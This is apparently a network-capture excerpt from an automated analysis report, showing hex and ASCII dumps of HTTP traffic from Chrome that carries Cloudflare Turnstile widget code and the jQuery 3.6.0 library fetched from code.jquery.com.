                                              2024-12-18 22:41:48 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                              Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                              2024-12-18 22:41:48 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                              Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                              2024-12-18 22:41:48 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                              Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                              2024-12-18 22:41:48 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                                              Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                                              2024-12-18 22:41:48 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                                              Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                                              2024-12-18 22:41:48 UTC1369INData Raw: 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f
                                              Data Ascii: existent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?
                                              2024-12-18 22:41:48 UTC1369INData Raw: 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e
                                              Data Ascii: __||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")throw n
                                              2024-12-18 22:41:48 UTC1369INData Raw: 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d
                                              Data Ascii: &&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=
                                              2024-12-18 22:41:48 UTC1369INData Raw: 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e
                                              Data Ascii: me="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449761151.101.194.1374434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:48 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                              Host: code.jquery.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:48 UTC613INHTTP/1.1 200 OK
                                              Connection: close
                                              Content-Length: 89501
                                              Server: nginx
                                              Content-Type: application/javascript; charset=utf-8
                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                              ETag: "28feccc0-15d9d"
                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                              Access-Control-Allow-Origin: *
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Via: 1.1 varnish, 1.1 varnish
                                              Accept-Ranges: bytes
                                              Date: Wed, 18 Dec 2024 22:41:48 GMT
                                              Age: 3083240
                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740034-EWR
                                              X-Cache: HIT, HIT
                                              X-Cache-Hits: 2774, 4
                                              X-Timer: S1734561708.487473,VS0,VE0
                                              Vary: Accept-Encoding
                                              2024-12-18 22:41:48 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                              2024-12-18 22:41:48 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                              2024-12-18 22:41:48 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                              2024-12-18 22:41:48 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                              2024-12-18 22:41:48 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                              2024-12-18 22:41:48 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                              2024-12-18 22:41:48 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                              2024-12-18 22:41:48 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                              2024-12-18 22:41:48 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
